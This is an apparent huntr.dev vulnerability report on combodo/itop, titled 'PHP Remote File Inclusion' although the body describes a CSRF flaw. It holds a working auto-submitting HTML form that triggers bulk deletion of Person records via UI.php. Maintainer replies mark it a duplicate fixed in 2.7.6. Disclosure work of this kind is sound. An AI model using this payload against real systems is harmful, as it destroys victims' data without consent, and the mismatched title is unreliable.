PHP Remote File Inclusion in combodo/itop
Valid
Reported on
Nov 24th 2021
Description
csrf bug
Proof of Concept
Bellow request is vulnerable to csrf attack
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8008/web/pages/UI.php" method="POST">
<input type="hidden" name="transaction_id" value="adm238C.tmp" />
<input type="hidden" name="operation" value="bulk_delete_confirmed" />
<input type="hidden" name="filter" value="%5B%22SELECT+%60Person%60+FROM+Person+AS+%60Person%60+WHERE+%28%60Person%60.%60id%60+IN+%28%2715%27%2C+%2712%27%2C+%2716%27%2C+%2717%27%2C+%276%27%2C+%2722%27%2C+%275%27%2C+%2724%27%2C+%278%27%2C+%2723%27%2C+%2727%27%2C+%2710%27%2C+%2711%27%2C+%2726%27%2C+%274%27%2C+%2714%27%2C+%279%27%2C+%2713%27%2C+%2728%27%2C+%271%27%2C+%272%27%2C+%2718%27%2C+%2729%27%2C+%273%27%2C+%2721%27%2C+%2719%27%2C+%2720%27%2C+%277%27%2C+%2725%27%29%29%22%2C%5B%5D%2C%5B%5D%5D" />
<input type="hidden" name="class" value="Person" />
<input type="hidden" name="selectObject[]" value="15" />
<input type="hidden" name="selectObject[]" value="12" />
<input type="hidden" name="selectObject[]" value="16" />
<input type="hidden" name="selectObject[]" value="17" />
<input type="hidden" name="selectObject[]" value="6" />
<input type="hidden" name="selectObject[]" value="22" />
<input type="hidden" name="selectObject[]" value="5" />
<input type="hidden" name="selectObject[]" value="24" />
<input type="hidden" name="selectObject[]" value="8" />
<input type="hidden" name="selectObject[]" value="23" />
<input type="hidden" name="selectObject[]" value="27" />
<input type="hidden" name="selectObject[]" value="10" />
<input type="hidden" name="selectObject[]" value="11" />
<input type="hidden" name="selectObject[]" value="26" />
<input type="hidden" name="selectObject[]" value="4" />
<input type="hidden" name="selectObject[]" value="14" />
<input type="hidden" name="selectObject[]" value="9" />
<input type="hidden" name="selectObject[]" value="13" />
<input type="hidden" name="selectObject[]" value="28" />
<input type="hidden" name="selectObject[]" value="1" />
<input type="hidden" name="selectObject[]" value="2" />
<input type="hidden" name="selectObject[]" value="18" />
<input type="hidden" name="selectObject[]" value="29" />
<input type="hidden" name="selectObject[]" value="3" />
<input type="hidden" name="selectObject[]" value="21" />
<input type="hidden" name="selectObject[]" value="19" />
<input type="hidden" name="selectObject[]" value="20" />
<input type="hidden" name="selectObject[]" value="7" />
<input type="hidden" name="selectObject[]" value="25" />
<input type="hidden" name="c[menu]" value="Contact" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
We are processing your report and will contact the
combodo/itop
team within 24 hours.
2 years ago
ranjit-git modified the report
2 years ago
This is a duplicate of https://huntr.dev/bounties/0a39630d-f4b9-4468-86d8-aea3b02f91ae/?token=4d1195d5a50a9f0f7ae9fc24a2b0a3bd907427edaf7ee6ac1f8f31c11d8b7a5d2c204957125e63fd7cf3a87df6d5d12a35f9c7107ba5f33b5f668fa199a36932448b9bf186daa62cb32b5635770730eb68eeeba079b8864ab00358fd0dc65fa406d986525814a14951db2025e117f0098a1f270f5a5b2c935a65b00b5106e5511b61d501c4357654cb8ea76b
Was fixed in 2.7.6 / N°4289 Corresponding GitHub advisory : https://github.com/Combodo/iTop/security/advisories/GHSA-33pr-5776-9jqf
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation